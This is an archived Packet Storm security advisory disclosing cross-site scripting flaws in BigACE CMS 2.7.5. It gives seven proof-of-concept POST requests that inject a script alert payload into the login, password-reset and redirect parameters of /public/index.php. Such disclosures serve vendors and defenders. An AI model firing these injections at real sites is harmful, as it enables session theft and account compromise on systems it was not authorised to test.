exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BigACE CMS 2.7.5 Cross Site Scripting

BigACE CMS 2.7.5 Cross Site Scripting
Posted Jan 3, 2012
Authored by demonalex

BigACE CMS version 2.7.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 364e3394c30b0a380a2b01fd289208b2355f63864d0efe688ee92bbb06d1b880

BigACE CMS 2.7.5 Cross Site Scripting

Change Mirror Download
Title: BigACE CMS - XSS Vulnerabilities

Software : BigACE CMS

Software Version : 2.7.5

Vendor: http://www.bigace.de/

Vulnerability Published : 2011-10-11

Vulnerability Update Time :

Status :

Impact : Medium

Bug Description :
BigACE Content Management System(version update : 2.7.5) is vulnerable to XSS.

Proof Of Concept :
1)language in /public/index.php , PoC:
POST http://192.168.10.211/public/index.php?cmd=application&id=-1_tauth_klogin_lde&PHPSESSID=ira7g0kjtlp6otttru0s78khk7
------------------------------------
UID=1&language="><SCRIPT>alert("demonalex");</SCRIPT>

2)UID in /public/index.php , PoC:
POST http://192.168.10.211/public/index.php?cmd=application&id=-1_tauth_klogin_lde&PHPSESSID=ira7g0kjtlp6otttru0s78khk7
------------------------------------
UID=1&language=de&UID="><SCRIPT>alert("demonalex");</SCRIPT>&language=de

3)REDIRECT_CMD in /public/index.php , PoC:
POST http://192.168.10.211/public/index.php?cmd=application&id=-1_tauth_klogin_len
------------------------------------
REDIRECT_ID=-1&REDIRECT_CMD="><SCRIPT>alert("demonalex");</SCRIPT>&UID=1&language=de&UID=1&language=de

4)REDIRECT_ID in /public/index.php , PoC:
POST http://192.168.10.211/public/index.php?cmd=application&id=-1_tauth_klogin_len
------------------------------------
REDIRECT_ID="><SCRIPT>alert("demonalex");</SCRIPT>&REDIRECT_CMD=admin&UID=1&language=de&UID=1&language=de

5)PW in /public/index.php , PoC:
POST http://192.168.10.211/public/index.php?cmd=application&id=-1_tauth_klogin_len
------------------------------------
UID=admin&PW="><SCRIPT>alert("demonalex");</SCRIPT>&language=en

6)UID in /public/index.php , PoC:
POST http://192.168.10.211/public/index.php?cmd=application&id=-1_tauth_klogin_len
------------------------------------
UID="><SCRIPT>alert("demonalex");</SCRIPT>&PW=123456&language=en

7)username in /public/index.php , PoC:
POST http://192.168.10.211/public/index.php?cmd=application&id=-1_tauth_kpassword_len
------------------------------------
password=do&username="><SCRIPT>alert("demonalex");</SCRIPT>

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK
Login or Register to add favorites

File Archive:

December 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    32 Files
  • 5
    Dec 5th
    10 Files
  • 6
    Dec 6th
    13 Files
  • 7
    Dec 7th
    23 Files
  • 8
    Dec 8th
    19 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close